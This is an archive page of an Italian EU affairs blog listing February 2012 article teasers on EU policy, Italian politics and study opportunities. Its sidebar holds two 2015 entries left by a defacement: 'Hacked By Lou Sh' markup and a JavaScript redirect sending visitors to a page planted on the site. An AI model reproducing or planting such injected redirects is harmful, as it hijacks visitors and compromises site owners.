EUROSBLOGS
--> Giugno 2013 Maggio 2013 Aprile 2013 Marzo 2013 Febbraio 2013 Gennaio 2013
Dicembre 2012 Novembre 2012 Ottobre 2012 Settembre 2012 Agosto 2012 Luglio 2012 Giugno 2012 Maggio 2012 Aprile 2012 Marzo 2012 February 2012 Gennaio 2012
Dicembre 2011 Novembre 2011 Ottobre 2011 Settembre 2011 Agosto 2011 Luglio 2011 Giugno 2011 Maggio 2011 Aprile 2011 Marzo 2011 Febbraio 2011 Gennaio 2011
Dicembre 2010 Novembre 2010 Ottobre 2010 Settembre 2010 Luglio 2010 Giugno 2010 Aprile 2010 Marzo 2010 Febbraio 2010
Febbraio 2012
it

Le borse di studio sono destinate a studentesse universitarie impegnate nello studio dell’informatica, dell’ingegneria o di altre discipline analoghe ed hanno lo scopo di promuovere l’inserimento di brillanti studiose nel settore informatico. Saranno assegnate in base al valore del curriculum universitario e alla passione dimostrata per le scienze informatiche. L’importo previsto è di 7000 euro o equivalenti.

L’informatica americana Anita Borg ha dedicato gran parte della sua vita a promuovere l’ingresso delle donne nel campo dell’informatica, tanto da fondare nel 1997 l’Institute for Women and Technology ,un’organizzazione no-profit, nata per aumentare la presenza delle donne nei settori tecnici e (...)

it

La Commissione europea volge questa volta la sua attenzione al mondo animale. Se anche la strategia si presenta come un insieme di misure a favore degli animali, non mancano le proteste di quanti credono sia stata rivolto maggiore interesse verso gli allevatori e verso una tutela del mercato e dell’aspetto economico.

E’ stato adottato il nuovo piano quadriennale (2012-2015) interamente dedicato a garantire il benessere degli animali. John Dalli, commissario Ue responsabile per la salute e i consumatori, ha dichiarato che proprio l’entrata in vigore della normativa sulla protezione delle “galline ovaiole” ha (...)

it

Il lancio della campagna in Italia avrà luogo a Verona dal 2 al 5 febbraio durante la Fieragricola.

La Politica Agricola Comune (PAC) rappresenta ormai un punto di riferimento per tutto il mondo agrario europeo. Durante il corso degli anni sono state approvate tante riforme volte alla produzione, alla lavorazione e allo scambio di prodotti che valorizzano il settore agricolo. La PAC entra in (...)

it

Farefuturo continua a credere nei giovani qualificati e nella necessità di far crescere una nuova classe dirigente per un’Italia migliore.

Per questo sta organizzando tre corsi di formazione: in giornalismo e comunicazione politica al tempo dei nuovi media; in tecniche legislative e strategie di comunicazione per assistenti e consulenti parlamentari; in storia e fondamenti del Popolarismo europeo. I percorsi didattici, ai quali (...)

it

Tre mesi di tirocinio formativo in modalità open, una settimana in presenza a Bruxelles, un project work di approfondimento su tematiche legate alle politiche comunitarie, un tutor di supporto all’apprendimento e di sostegno durante il tirocinio pratico. E questo è solo l’inizio.

Il Centro Europeo di Studi e Ricerche di Bruxelles offre agli studenti universitari un progetto di formazione a distanza innovativa, che rivoluziona l’approccio classico dello stage. Vuoi conoscere l’Europa? Vuoi essere il protagonista delle politiche comunitarie? L’European Open Stage ha come (...)

it

Professori altamente qualificati, professionisti della professione giornalistica e non solo. Così la fondazione FareFuturo ha strutturato i suoi corsi di alta formazione per i professionisti della comunicazione.

La  fondazione Farefuturo allestisce corsi di formazione con l’intento di preparare al  meglio i giovani e formare una futura classe dirigente altamente qualificata. Farefuturo crede fermamente nella necessità di investire sul domani. Per tale motivo la fondazione organizza dei corsi di formazione (...)

it

Nell’importante evento annuale del World Economic Forum (WEF) svoltosi a Davos fino allo scorso 31 gennaio, il premier britannico Cameron David ha mostrato tutta la sua ostilità verso l’adozione della Tobin Tax. Non sono state clementi le parole utilizzate dal premier, il quale ha definito “pura follia” la proposta di introdurre una tassa sulle transizioni finanziare avanzata da Francia e Germania. In modo particolare, la Francia sembra essere decisa ad andare avanti anche senza l’appoggio dell’Inghilterra per l’effettiva introduzione della tassa.

È giunto alla sua 42esima edizione. Si tratta di uno degli eventi più importanti della politica europea, l’evento definito come l’appuntamento economico più atteso dell’anno, il World Economic Forum (WEF), che si è svolto nella località svizzera di Davos. Cinque giornate interamente dedicate al dialogo (...)

it

La data di scadenza per presentare le candidature al Premio Carlo Magno per la gioventù è stata prorogata fino al 13 febbraio 2012 in maniera tale da permettere ad un numero maggiore di progetti di presentare le loro candidature.

Il “Premio europeo Carlo Magno per la Gioventù”, giunto alla sua quinta edizione,mira ad incentivare la crescita di una coscienza europea tra i giovani e ad aumentare la loro adesione ai progetti d’integrazione europea. Il concorso, giunto alla sua quinta edizione è organizzato grazie alla (...)

it

Con un accordo del 23 gennaio scorso, i Paesi membri europei hanno optato per un embargo petrolifero totale nei confronti dell’Iran mettendo quindi al bando il greggio esportato dal Paese. Il provvedimento non avrà effetto immediato ma inizierà da luglio 2012.

Lo scorso lunedì a Bruxelles, i rappresentanti degli Stati dell’Unione europea hanno deciso di muoversi uniti nei confronti dell’Iran e del suo molto discusso programma nucleare decretando sanzioni e provvedimenti nei confronti dello Stato medio - orientale. L’accordo tra i 27 prevede la (...)

it

Circa 40 nazioni, tra cui 22 dei 27 Stati membri dell’Unione Europea, hanno firmato a Tokyo, lo scorso 26 gennaio, l’ACTA (Anti-Counterfeiting Trade Agreement), un accordo per sconfiggere la pirateria online e fermare la contraffazione dei beni materiali e immateriali. Ma c’è già chi protesta sostenendo che un tale provvedimento vada a ledere gravemente la libertà della rete.

Quando nel lontano 1991 il CERN, Centro Europeo di Ricerca Nucleare, annunciò la nascita del World Wide Web (WWW o semplicemente Web) i vantaggi offerti dalla rete furono chiari sin da subito. Internet, che per sua natura presenta una logica free, permette infatti a tutti i suoi potenziali (...)

it

“Let’s go France”: due seminari informativi organizzati per approfondire le opportunità di studio e di lavoro offerte a tutti i ragazzi che intendono vivere un’esperienza in Francia

La terra transalpina dal punto di vista accademico ha sempre avuto un ruolo di primo piano nella tradizione culturale del vecchione continente. La Francia annovera numerosi istituti di istruzione superiore(enseignement supérieur) . Accanto ai 75canonici istituti universitari( di cui 13 nella (...)

it

Il 50% degli alimenti consumati in Europa finiscono direttamente nella pattumiera, e il trend è in costante crescita nonostante la crisi economica. Il Parlamento europeo mette così in atto delle misure finalizzate alla diminuzione degli sprechi alimentari. Tanti i provvedimenti, una sola la certezza: a sprecare cibo in buone condizioni siamo tutti. Così il 2014 dovrebbe diventare l'anno europeo degli sprechi alimentari

79 milioni di europei vivono al di sotto della soglia di povertà e 16 milioni di individui usufruiscono degli aiuti alimentari provenienti dalle organizzazioni umanitarie; eppure, i cittadini del Vecchio continente gettano quotidianamente migliaia di tonnellate di cibo ancora in buone condizioni (...)

en

The symbol of the new Italy, Prime Minister Mario Monti, is to meet with President Barack Obama. However, just like in 1992-1993, the window of opportunity in which he is operating will probably soon close if parties let domestic and self-interest considerations take over on a national imperative for permanent change

Current events in Italy recall the situation faced by Giuliano Amato’s 1992-93 government. Like Monti, Amato became Prime Minister in a moment of economic and political emergency. In both cases, the EU monetary system was in the background of the crises and the need to respond to the EU’s (...)

it

Il giorno dopo la visita di Monti alla casa Bianca, non c’è traccia del Professore sui quotidiani americani. Anche il Times, che lo mette in copertina nell’edizione europea, su quella americana ha optato per un immagine con dei cani. L’articolo invece c’è. È un articolo interessante che delinea luci e ombre, loda le riforma ma delinea anche il rischio che la window of opportunity in cui il Professore si trova adesso ad operare si chiuda velocemente. E aggiunge un commento pesante: “ Oggi [Monti] regna a Roma come un novello Cesare. In effetti il processo democratico è stato sospeso per permettere ad un tecnico non eletto di portare a compimento politiche che i politici non riuscivano a fare”. Al Congresso, lo Speaker della Camera John Boehner nell’incontro con Monti ha elogiato il ruolo dei parlamenti nella democrazia. Suona quasi come un avvertimento.

Gli americani non usano le parole a caso e la politica estera è essenzialmente realista e di matrice razionale, nella scia di Hans Morgentau e Henry Kissinger. Il ruolo di leader mondiale degli Stati Uniti ne è il principio guida – e non a caso fu il passaggio più applaudito all’inaugurazione di (...)

it

Dalle statistiche condotte dall’Eurostat, è emerso che il 23,4% della popolazione europea vive il rischio di povertà o di esclusione sociale. I dati riferiti al 2010, sembrano essere stati aggravati nel 2011 dalla crisi economica registratasi nell’ultimo periodo. Le percentuali registrate mostrano una situazione ancor più grave per i giovani al di sotto dei 17 anni di età. È, infatti, il 27% dei giovani a essere a rischio povertà.

115 milioni, il 23,4% del circa mezzo miliardo dei cittadini europei, risulta a rischio povertà o in condizioni di esclusione sociale. Questi i dati, riferiti al 2010, trasmessi in questi giorni dall’Eurostat, l’ufficio statistico dell’Unione europea. Per l’elaborazione dei dati, l’Eurostat si è (...)

it

Nella serata del 12 Febbraio scorso, il governo del premier Papademos ha ottenuto il voto favorevole del Parlamento greco al piano di austerità presentato al fine di evitare il fallimento dello stato ellenico. Nel frattempo migliaia di persone sono scese in piazza a manifestare.

La Grecia è già qualche mese sull’orlo del baratro e ogni minima scintilla rischia di far incendiare un clima ormai rovente e ai limiti della sopportazione. Dopo le rivolte di gennaio e di fine 2011, questa volta a far scatenare le violenze per le strade è stata la discussione e la successiva (...)

it

Herman Van Rompuy, Presidente del Consiglio europeo, e Josè Manuel Barroso, Presidente della Commissione europea, hanno fatto visita al paese asiatico convinti di poter riuscire a ricavare qualche spunto interessante per avviare una partnership tra l'Europa e Cina. Il colosso asiatico è pronto ad intervenire per aiutare a risolvere la crisi economica che l'Europa non riesce a debellare, soprattutto in alcuni stati come la Grecia.

Wen Jiabao, Primo Ministro del Consiglio di Stato della Repubblica Popolare Cinese e membro del Comitato Permanente del Politburo del Partito Comunista Cinese, ha affermato davanti a Barroso e a Van Rompuy che la Cina è pronta a partecipare attivamente per risollevare l’economia europea, per (...)

it

Lo scorso 26 gennaio a Bruxelles, la Commissione Europea ha formalmente richiamato l’Italia in materia di farmaci generici, invitandola a conformarsi alla vigente normativa europea relativa alle procedure di autorizzazione alla commercializzazione di tali medicinali, al fine di tutelare i produttori e di porli in una posizione equa sul mercato.

I farmaci generici, detti anche equivalenti, sono comparsi nel mercato a partire dal 2001. Tali farmaci si differenziano da quelli cosiddetti “di marca” sotto vari aspetti: non sono coperti dal settore dei brevetti, costano meno - infatti secondo alcune stime i clienti possono risparmiare fino al (...)

it

Con la rivoluzione digitale il mondo sta cambiando sempre più velocemente, talmente veloce che leggi e normative di cinque o sei anni fa risultano oggi già obsolete. Immaginate allora una normativa del 1995 quanto possa essere anacronistica nel 2012. Soprattutto se il tema riguarda la protezione dei dati. Considerando che 17 anni fa solo l’1% dei cittadini europei disponeva di una connessione Internet, continuare a tutelare la privacy dei “netizens” con leggi preistoriche rappresenta sul serio un problema preoccupante. Proprio in virtù di queste considerazioni l’UE ha deciso di rimettere mano alla normativa del 1995 e riformarla per smentire il mito secondo il quale la Rete non dimentica mai.

Finalmente si è arrivati alla conclusione di un progetto che dura da più di due anni: la Commissione europea ha presentato la proposta, attraverso la sua vicepresidente e commissaria per la giustizia, Viviane Reding, di riforma in merito alla protezione dei dati online. “La protezione dei dati (...)

it

Per far fronte alle spese dovute agli ingenti danni causati dal maltempo, alcune Regioni del centro Italia hanno chiesto di poter usufruire dell’apposito fondo europeo di solidarietà (FSUE), destinato proprio alle calamità naturali e che tra i vari obiettivi prevede il ripristino immediato delle infrastrutture e delle attrezzature nei diversi settori dell'elettricità , delle condutture idriche e fognarie, delle telecomunicazioni, dei trasporti, della sanità e dell'istruzione. L’Italia dovrà però dimostrare di avere i requisiti necessari per ottenere i finanziamenti. Da sottolineare infine l’impegno del Commissario europeo Tajani affinché l’operazione vada a buon fine.

L’ondata di maltempo che in queste ultime settimane ha colpito l’Italia ci ha visto costretti a fare i conti con i tanti disagi che la neve e il gelo hanno portato in tutto il paese. Già perché svanito l’entusiasmo dei primi momenti – dettato soprattutto dallo stupore di risvegliarsi una mattina e (...)

it

Dopo 300 anni di unione, il rischio di una secessione scozzese sembra più realistico che mai. Così il premier britannico si è subito recato in Scozia per cercare di trovare un accordo con il capo del governo Salmond e difendere l’unità del Regno.

Quando nel 1707 il Parlamento Scozzese, riunito insieme a quello inglese, votò congiuntamente l’Atto di Unione, riguardante la fusione tra la Scozia e l’Inghilterra, non avrebbero mai pensato chenel 2012, si sarebbe riaperto quel discorso sulla volontà di indipendenza della regione scozzese. Oggi (...)

it

L’aumento dei posti di lavoro per i giovani è stata la principale questione affrontata durante il Consiglio dell’Unione europea tenutosi a Bruxelles. L’interesse dei Paesi partecipanti è stato rivolto anche all’incremento del finanziamento dell’economia e al completamento del mercato unico digitale. Sono state concluse le direttive riguardanti un trattato separato finalizzato alla creazione di un fondo salva Stati permanente, che dovrebbe diventare operativo il prossimo luglio 2012.

Si è tenuto lo scorso 31 gennaio a Bruxelles il primo Consiglio dell’Unione Europea del 2012 sotto la Presidenza danese. Numerosi i punti affrontati dai 27 Paesi che hanno preso parte al Consiglio e che hanno avanzato le loro proposte finalizzate alla crescita del numero dei posti di lavoro. (...)

it

La Commissione europea minaccia l'Italia di dover pagare centinaia di milioni di euro per il ritardo dei pagamenti dovuti; al Bel Paese l'obbligo di giustificare la propria condotta per evitare la sanzione. Lo scontro Ue-Italia sulle quote latte sembra essere giunto all'epilogo dopo più di quindici anni di tensioni.

La Commissione europea ha avviato una procedura d’infrazione nei confronti dell’Italia in seguito alla decisione, assunta dallo Stato italiano, di applicare delle rate alle multe per l’eccessiva produzione di late rispetto alla quantità indicata dall’Unione Europea comminate ai produttori non (...)

it

Il programma Fulbright dal 2006 è realtà anche negli Stati membri dell’UE. Nato nel 1946 su proposta del senatore statunitense William Fulbright, ancora oggi si ispira agli stessi principi di allora per raggiungere i suoi obiettivi: agevolare rapporti pacifici tra Stati Uniti d’America e altre potenze mondiali, favorire scambi interculturali e creare importanti cooperazioni nel campo dell’istruzione e dello sviluppo delle istituzioni universitarie.

Stati Uniti e Unione Europea, loro le protagoniste indiscusse di un importante programma transatlantico, che continua a consentire di offrire diverse opportunità di studio e lavoro a migliaia di cittadini europei e statunitensi. Fulbright, questo il nome del progetto, è un programma di sostegno a (...)

it

Dopo due mesi di pressioni mediatiche e politiche, il capo di Stato tedesco ha annunciato di aver rassegnato le dimissioni nel corso di una breve conferenza stampa tenutasi a Berlino. L'uomo di fiducia della Cancelliera Merkel ha spaccato la Germania, al suo successore il compito di ripristinare il rigore confacente ad un presidente federale

Lo scorso 17 febbraio il Presidente della Repubblica tedesco Christian Wulff ha rassegnato le dimissioni a causa dello scandalo che lo ha travolto in seguito all’ottenimento di un finanziamento a tasso agevolato da parte di un imprenditore amico e al beneficio di una piccola vacanza pagata da (...)

it

Approvato con 369 voti favorevoli, il nuovo accordo si pone come principale obiettivo quello di favorire il commercio con il Marocco, garantendo così lo sviluppo di un Paese in forte crisi economica e sociale, ma non sono mancate le opposizioni. Infatti, il trattato ha incontrato la contrarietà di chi, come il presidente della Confagricoltura, Mario Guidi, ha messo in evidenza lo squilibrio creatosi tra Marocco, fortemente avvantaggiato, e l’Europa stessa, verso la quale non sono state previste importanti misure di salvaguardia.

È stato definito lo scorso 16 febbraio l’accordo bilaterale Ue-Marocco, che prevede la liberalizzazione del commercio di prodotti agricoli e della pesca. Il negoziato, approvato dal Parlamento con 369 voti favorevoli, 225 contrari e 31 astensioni, si pone come principale obiettivo quello di (...)

it

Un’alleanza formata dai rappresentanti della Cina, degli Stati Uniti e delle maggiori potenze industriali contrari alla Carbon Tax sulle compagnie aeree sta mettendo in serio pericolo gli accordi commerciali tra l’UE e i suoi partner.

Il primo gennaio 2012 è entrato in vigore l’Emission Trading Scheme, ovvero il modello europeo riguardante la negoziazione delle emissioni. Lanciato nel 2005, si presenta come il cardine delle politiche messe in atto per arrestare il cambiamento climatico ed è un esempio tipico della della (...)

en
it

To give you an idea of how social media and the digital era have changed our ways, not only to live, but also to die, we will consider the example of the most famous Internet platform of sociality: Facebook. Is it good to keep alive the social life of dead people? Isn’t it painful torture for the people who loved them, making them believe to still have a contact with their beloved ones? Is it a way to accomplish the obsessive curiosity of the other users? Or are we all just profile pages to be filled with advertisements?

The death of one of our relatives or friends always marks our lives, irremediably. It is the worst thing that can happen, to us to accept that someone that we have loved so much and that was so important for our life doesn’t exist anymore. We can search for them, we can go to the places that (...)

it
en

Per darvi un’idea di come i social media e il mondo digitale hanno cambiato non solo il nostro modo di vivere, ma anche di morire, prenderemo ad esempio la più famosa piattaforma sociale di Internet, ovvero: Facebook. È giusto che la vita sociale di persone decedute continui ad esistere? Non è, piuttosto, una dolorosa tortura per le persone che hanno amato chi non c’è più, fargli credere che ci sia ancora un modo per essere in contatto con i loro cari? O, ancora, è questo un modo per assecondare l’ossessiva curiosità degli altri utenti? Alla fine dei conti, siamo solo pagine di profili da riempire con pubblicità?

La morte di un nostro parente o un nostro amico segna la nostra vita, irrimediabilmente. È la cosa peggiore che ci possa mai accadere, accettare che una persona che abbiamo amato così tanto e che è stata così tanto importante per la nostra vita non ci sia più. Possiamo non rassegnarci, possiamo (...)

it

Il 15 febbraio l’UE ha pubblicato i risultati di un’indagine sulla corruzione realizzata attraverso interviste a 26.856 cittadini dei 27 Stati membri. Risultato? È presente ovunque, anche se in alcuni paesi è “più presente” che in altri

C’è un vecchio detto che l’Eurobarometro sembra aver fotografato perfettamente nella sua ultima indagine. “Tutto il mondo è paese”, o più precisamente “tutta l’Europa è il Belpaese”. Infatti stando ai risultati del servizio di ricerca della Commissione UE, una delle caratteristiche più peculiari italiane, (...)

it

Si chiama “L’innovazione per una crescita sostenibile: una bioeconomia per l’Europa” l’ultima strategia presentata a Bruxelles dalla Commissione europea e che sancirà il passaggio a una bioeconomia sostenibile “post-petrolio”. Tre gli assi principali previsti della strategia al fine di creare quella complementarietà con altri settori, strumenti e fonti di finanziamento in modo da migliorare in Europa lo sfruttamento delle risorse rinnovabili esistenti.

Le risorse rinnovabile, dette anche sostenibili, sono così definite in virtù di tutte quelle caratteristiche che consentono loro di rinnovarsi nel tempo e di far sì che l’uomo ne possa disporre in maniera pressoché indefinita. Caratteristiche che assumono un’importanza centrale soprattutto in (...)

it

Il 15 febbraio due marinai italiani hanno sparato ed ucciso due pescatori indiani. Il caso sembra aver incrinato un buon rapporto tra i due paesi, che stanno lavorando da soli per trovare una soluzione

Un vero e proprio giallo: pieno di punti interrogativi, l’intrigo internazionale farebbe invidia allo stesso Hitchcock. L’unica cosa certa, per ora, è che l’UE non ha alzato un dito. Ma procediamo con ordine. India, 15 febbraio: a bordo della petroliera italiana Enrica Lexie, due fanti della marina (...)

en
it

The Jean Monnet International Summer Seminars of the Jean Monnet Centre of Excellence of the University of Rome “Tor Vergata”, now in its 9th edition, will take place from the 2nd to the 13th July, 2012, in Rome, Italy. The theme of this year is The Future of International Politics and of International Negotiations. The two questions that the summer seminar will modestly try to answer are in particular: where is the world going to go? How can we make international negotiations more effective?

2012 is being characterized by elections in France, Russia and the US, but also in Iran, Venezuela, Egypt, Mexico, Libya and other pivotal states. What will result could be a different – hopefully less conflictual – world. Meanwhile, the strategic objectives of the traditional powers are (...)

Dialogo con i cittadini sul Futuro dell’Europa

L’Eurosblog è media partner dell’iniziativa "Dialogo con i cittadini sul Futuro dell’Europa" organizzata dalla Rappresentanza in Italia della Commissione europea. Una serie di dibattiti aperti tra la Commissione europea e i cittadini sui temi dell’occupazione, della protezione dei cittadini e della sostenibilità. L’obiettivo è rispondere insieme alla domanda: “Che Europa vogliamo nel futuro?”. Guarda il video viral e fai la tua domanda su Twitter, utilizzando l’hashtag #EUdeb8. Segui l’evento in streaming su http://webcast.ec.europa.eu/eutv/po...

Quale Europa vogliamo nel futuro?


Ultimo commento

Erasmus+: il nuovo programma di studio per i giovani in Europa
di réduction toysrus, le 21 agosto 2013

Nice article :). I’ve studied abroad in Espagna y eso fue una experiencia unica: tanto al nivel laboral como humano! Je recommande ça à tout le monde :)


comitato



Ultimi articoli del blog

<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/cc82855323b3141664fde5d9afad6d5c.png">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
15 marzo 2015
<!DOCTYPE HTML>      <head>         <meta charset= Hacked By Lou Sh If you are not redirected automatically, follow the link to example " title=" Hacked By Lou Sh If you are not redirected automatically, follow the link to example " src="local/cache-gd2/646bc521095d5a61646327c7b727a862.jpg">
window.location.href = "http://torvergata.eurosblog.eu/IMG/html/" (...)
17 febbraio 2015



© Groupe Euros du Village 2010 | Note legali | Sito realizzato con SPIP | Relizzazione tecnica e design : Media Animation & Euros du Village France